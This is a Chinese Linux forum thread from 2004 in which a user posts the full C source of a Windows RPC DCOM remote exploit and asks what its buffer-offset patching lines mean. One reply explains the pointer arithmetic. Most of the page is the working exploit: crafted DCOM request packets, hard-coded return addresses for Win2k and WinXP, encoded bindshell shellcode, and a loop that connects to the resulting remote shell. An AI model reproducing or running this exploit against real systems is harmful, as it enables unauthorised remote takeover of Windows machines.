设为首页收藏本站

LinuxSir.cn,穿越时空的Linuxsir!

 找回密码
 注册
搜索
热搜: shell linux mysql
LinuxSir.cn,穿越时空的Linuxsir!»论坛 编程开发讨论区 —— LinuxSir.cn Linux 程序设计专题讨论 谁来分析下这段代码
返回列表 发新帖
查看: 790|回复: 3

谁来分析下这段代码

[复制链接]
发表于 2004-1-9 13:00:37 | 显示全部楼层 |阅读模式

  2. /* Windows 2003 <= remote RPC DCOM exploit
  3. * Coded by .:[oc192.us]:. Security
  4. *
  5. * Features:
  6. *
  7. * -d destination host to attack.
  8. *
  9. * -p for port selection as exploit works on ports other than 135(139,445,539 etc)
  10. *
  11. * -r for using a custom return address.
  12. *
  13. * -t to select target type (Offset) , this includes universal offsets for -
  14. * win2k and winXP (Regardless of service pack)
  15. *
  16. * -l to select bindshell port on remote machine (Default: 666)
  17. *
  18. * - Shellcode has been modified to call ExitThread, rather than ExitProcess, thus
  19. * preventing crash of RPC service on remote machine.
  20. *
  21. * This is provided as proof-of-concept code only for educational
  22. * purposes and testing by authorized individuals with permission to
  23. * do so.
  24. */

  26. #include <stdio.h>
  27. #include <stdlib.h>
  28. #include <sys/types.h>
  29. #include <sys/socket.h>
  30. #include <netinet/in.h>
  31. #include <arpa/inet.h>
  32. #include <unistd.h>
  33. #include <netdb.h>
  34. #include <fcntl.h>
  35. #include <unistd.h>

  37. /* xfocus start */
  38. unsigned char bindstr[]={
  39. 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
  40. 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
  41. 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
  42. 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
  43. 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

  45. unsigned char request1[]={
  46. 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
  47. ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
  48. ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
  49. ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
  50. ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
  51. ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
  52. ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
  53. ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
  54. ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
  55. ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
  56. ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
  57. ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
  58. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
  59. ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
  60. ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  61. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
  62. ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
  63. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
  64. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
  65. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
  66. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
  67. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
  68. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
  69. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
  70. ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
  71. ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
  72. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
  73. ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  74. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  75. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  76. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  77. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
  78. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
  79. ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
  80. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
  81. ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
  82. ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
  83. ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
  84. ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  85. ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
  86. ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
  87. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
  88. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
  89. ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
  90. ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
  91. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  92. ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
  93. ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
  94. ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  95. ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
  96. ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
  97. ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  98. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
  99. ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
  100. ,0x00,0x00,0x00,0x00,0x00,0x00};

  102. unsigned char request2[]={
  103. 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
  104. ,0x00,0x00,0x5C,0x00,0x5C,0x00};

  106. unsigned char request3[]={
  107. 0x5C,0x00
  108. ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
  109. ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
  110. ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
  111. ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
  112. /* end xfocus */

  114. int type=0;
  115. struct
  116. {
  117. char *os;
  118. u_long ret;
  119. }
  120. targets[] =
  121. {
  122. { "[Win2k-Universal]", 0x0018759F },
  123. { "[WinXP-Universal]", 0x0100139d },
  124. }, v;


  127. void usage(char *prog)
  128. {
  129. int i;
  130. printf("RPC DCOM exploit coded by .:[oc192.us]:. Security\n");
  131. printf("Usage:\n\n");
  132. printf("%s -d <host> [options]\n", prog);
  133. printf("Options:\n");
  134. printf(" -d: Hostname to attack [Required]\n");
  135. printf(" -t: Type [Default: 0]\n");
  136. printf(" -r: Return address [Default: Selected from target]\n");
  137. printf(" -p: Attack port [Default: 135]\n");
  138. printf(" -l: Bindshell port [Default: 666]\n\n");
  139. printf("Types:\n");
  140. for(i = 0; i < sizeof(targets)/sizeof(v); i++)
  141. printf(" %d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os);
  142. exit(0);
  143. }

  145. unsigned char sc[]=
  146. "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
  147. "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
  148. "\x46\x00\x58\x00\x46\x00\x58\x00"

  150. "\xff\xff\xff\xff" /* return address */

  152. "\xcc\xe0\xfd\x7f" /* primary thread data block */
  153. "\xcc\xe0\xfd\x7f" /* primary thread data block */

  155. /* bindshell no RPC crash, defineable spawn port */
  156. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  157. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  158. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  159. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  160. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  161. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  162. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  163. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  164. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  165. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  166. "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
  167. "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
  168. "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
  169. "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
  170. "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
  171. "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
  172. "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
  173. "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
  174. "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
  175. "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
  176. "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
  177. "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
  178. "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
  179. "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
  180. "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
  181. "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
  182. "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
  183. "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
  184. "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
  185. "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
  186. "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
  187. "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
  188. "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
  189. "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
  190. "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
  191. "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
  192. "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
  193. "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
  194. "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
  195. "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
  196. "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
  197. "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";

  199. /* xfocus start */
  200. unsigned char request4[]={
  201. 0x01,0x10
  202. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
  203. ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
  204. ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  205. };
  206. /* end xfocus */

  208. /* Not ripped from teso =) */
  209. void con(int sockfd)
  210. {
  211. char rb[1500];
  212. fd_set fdreadme;
  213. int i;

  215. FD_ZERO(&fdreadme);
  216. FD_SET(sockfd, &fdreadme);
  217. FD_SET(0, &fdreadme);

  219. while(1)
  220. {
  221. FD_SET(sockfd, &fdreadme);
  222. FD_SET(0, &fdreadme);
  223. if(select(FD_SETSIZE, &fdreadme, NULL, NULL, NULL) < 0 ) break;
  224. if(FD_ISSET(sockfd, &fdreadme))
  225. {
  226. if((i = recv(sockfd, rb, sizeof(rb), 0)) < 0)
  227. {
  228. printf("[-] Connection lost..\n");
  229. exit(1);
  230. }
  231. if(write(1, rb, i) < 0) break;
  232. }

  234. if(FD_ISSET(0, &fdreadme))
  235. {
  236. if((i = read(0, rb, sizeof(rb))) < 0)
  237. {
  238. printf("[-] Connection lost..\n");
  239. exit(1);
  240. }
  241. if (send(sockfd, rb, i, 0) < 0) break;
  242. }
  243. usleep(10000);
  244. }

  246. printf("[-] Connection closed by foreign host..\n");

  248. exit(0);
  249. }

  251. int main(int argc, char **argv)
  252. {
  253. int len, len1, sockfd, c, a;
  254. unsigned long ret;
  255. unsigned short port = 135;
  256. unsigned char buf1[0x1000];
  257. unsigned char buf2[0x1000];
  258. unsigned short lportl=666; /* drg */
  259. char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */
  260. struct hostent *he;
  261. struct sockaddr_in their_addr;
  262. static char *hostname=NULL;

  264. if(argc<2)
  265. {
  266. usage(argv[0]);
  267. }

  269. while((c = getopt(argc, argv, "d:t:r:p:l:"))!= EOF)
  270. {
  271. switch (c)
  272. {
  273. case 'd':
  274. hostname = optarg;
  275. break;
  276. case 't':
  277. type = atoi(optarg);
  278. if((type > 1) || (type < 0))
  279. {
  280. printf("[-] Select a valid target:\n");
  281. for(a = 0; a < sizeof(targets)/sizeof(v); a++)
  282. printf(" %d [0x%.8x]: %s\n", a, targets[a].ret, targets[a].os);
  283. return 1;
  284. }
  285. break;
  286. case 'r':
  287. targets[type].ret = strtoul(optarg, NULL, 16);
  288. break;
  289. case 'p':
  290. port = atoi(optarg);
  291. if((port > 65535) || (port < 1))
  292. {
  293. printf("[-] Select a port between 1-65535\n");
  294. return 1;
  295. }
  296. break;
  297. case 'l':
  298. lportl = atoi(optarg);
  299. if((port > 65535) || (port < 1))
  300. {
  301. printf("[-] Select a port between 1-65535\n");
  302. return 1;
  303. }
  304. break;
  305. default:
  306. usage(argv[0]);
  307. return 1;
  308. }
  309. }

  311. if(hostname==NULL)
  312. {
  313. printf("[-] Please enter a hostname with -d\n");
  314. exit(1);
  315. }

  317. printf("RPC DCOM remote exploit - .:[oc192.us]:. Security\n");
  318. printf("[+] Resolving host..\n");

  320. if((he = gethostbyname(hostname)) == NULL)
  321. {
  322. printf("[-] gethostbyname: Couldnt resolve hostname\n");
  323. exit(1);
  324. }

  326. printf("[+] Done.\n");

  328. printf("-- Target: %s:%s:%i, Bindshell:%i, RET=[0x%.8x]\n",
  329. targets[type].os, hostname, port, lportl, targets[type].ret);

  331. /* drg */
  332. lportl=htons(lportl);
  333. memcpy(&lport[1], &lportl, 2);
  334. *(long*)lport = *(long*)lport ^ 0x9432BF80;
  335. memcpy(&sc[471],&lport,4);

  337. memcpy(sc+36, (unsigned char *) &targets[type].ret, 4);

  339. their_addr.sin_family = AF_INET;
  340. their_addr.sin_addr = *((struct in_addr *)he->h_addr);
  341. their_addr.sin_port = htons(port);

  343. if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
  344. {
  345. perror("[-] Socket failed");
  346. return(0);
  347. }

  349. if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
  350. {
  351. perror("[-] Connect failed");
  352. return(0);
  353. }

  355. /* xfocus start */
  356. len=sizeof(sc);
  357. memcpy(buf2,request1,sizeof(request1));
  358. len1=sizeof(request1);

  360. *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;
  361. *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;

  363. memcpy(buf2+len1,request2,sizeof(request2));
  364. len1=len1+sizeof(request2);
  365. memcpy(buf2+len1,sc,sizeof(sc));
  366. len1=len1+sizeof(sc);
  367. memcpy(buf2+len1,request3,sizeof(request3));
  368. len1=len1+sizeof(request3);
  369. memcpy(buf2+len1,request4,sizeof(request4));
  370. len1=len1+sizeof(request4);

  372. *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;


  375. *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;
  376. *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
  377. *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
  378. *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
  379. *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
  380. *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
  381. *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;
  382. /* end xfocus */


  385. if (send(sockfd,bindstr,sizeof(bindstr),0)== -1)
  386. {
  387. perror("[-] Send failed");
  388. return(0);
  389. }
  390. len=recv(sockfd, buf1, 1000, 0);

  392. if (send(sockfd,buf2,len1,0)== -1)
  393. {
  394. perror("[-] Send failed");
  395. return(0);
  396. }
  397. close(sockfd);
  398. sleep(1);

  400. their_addr.sin_family = AF_INET;
  401. their_addr.sin_addr = *((struct in_addr *)he->h_addr);
  402. their_addr.sin_port = lportl;

  404. if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
  405. {
  406. perror("[-] Socket failed");
  407. return(0);
  408. }

  410. if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
  411. {
  412. printf("[-] Couldnt connect to bindshell, possible reasons:\n");
  413. printf(" 1: Host is firewalled\n");
  414. printf(" 2: Exploit failed\n");
  415. return(0);
  416. }

  418. printf("[+] Connected to bindshell..\n\n");

  420. sleep(2);

  422. printf("-- bling bling --\n\n");

  424. con(sockfd);

  426. return(0);
  427. }
复制代码
回复

使用道具 举报

 楼主| 发表于 2004-1-9 13:01:52 | 显示全部楼层
我想知道
/* xfocus start */
len=sizeof(sc);
memcpy(buf2,request1,sizeof(request1));
len1=sizeof(request1);

*(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;
*(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;

memcpy(buf2+len1,request2,sizeof(request2));
len1=len1+sizeof(request2);
memcpy(buf2+len1,sc,sizeof(sc));
len1=len1+sizeof(sc);
memcpy(buf2+len1,request3,sizeof(request3));
len1=len1+sizeof(request3);
memcpy(buf2+len1,request4,sizeof(request4));
len1=len1+sizeof(request4);

*(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;


*(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;
/* end xfocus */

这段到底啥意思。。。。发送的缓冲是几段合并起来的,但是比如
*(unsigned long *)(buf2+0x18c)=。。。。
这又是什么意思?
回复 支持 反对

使用道具 举报

poleman
发表于 2004-1-10 16:01:39 | 显示全部楼层

没时间仔细看

二楼的这段代码象是打包数据,将数据转移到buf2指向的 区间,至于一楼这段代码是干什么的,关键看你是 什么数据,感觉是段搞坏的 代码。

这句 *(unsigned long *)(buf2+0x18c)=。。。。是修改指针偏移量并填入数据,不修改buf2的值,只修改偏移量,其实二楼的代码buf2的值就没更改过
回复 支持 反对

使用道具 举报

 楼主| 发表于 2004-1-12 13:01:52 | 显示全部楼层

回复: 没时间仔细看

最初由 poleman 发表
二楼的这段代码象是打包数据,将数据转移到buf2指向的 区间,至于一楼这段代码是干什么的,关键看你是 什么数据,感觉是段搞坏的 代码。

这句 *(unsigned long *)(buf2+0x18c)=。。。。是修改指针偏移量并填入数据,不修改buf2的值,只修改偏移量,其实二楼的代码buf2的值就没更改过

哦,原来是修改buf2的内容。是rpc攻击程序
我就是对他的的数据包构造没明白。谢谢
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表